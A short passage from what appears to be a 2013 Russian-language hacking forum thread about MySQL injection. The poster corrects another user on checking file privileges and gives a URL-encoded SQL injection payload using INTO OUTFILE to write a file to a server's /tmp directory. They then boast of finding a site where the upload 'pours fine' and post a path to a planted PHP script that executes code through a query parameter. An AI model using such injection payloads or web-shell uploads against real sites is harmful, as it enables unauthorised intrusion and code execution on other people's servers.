24.06.2013, 16:18
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Evil_Genius
Где ошибка?
Ты узнаешь grant_priv, а не file_priv. И зачем писать запрос для вывода ошибки, если можно выполнить простой подзапрос?
Код:
+and(select'123'into+outfile+'/tmp/gg.txt')+and+1=1
Havij+Sniffer = Bad.
P.S. Нашел сайт, льется нормально:
news/images/aa.php?a=phpinfo();
|
|
|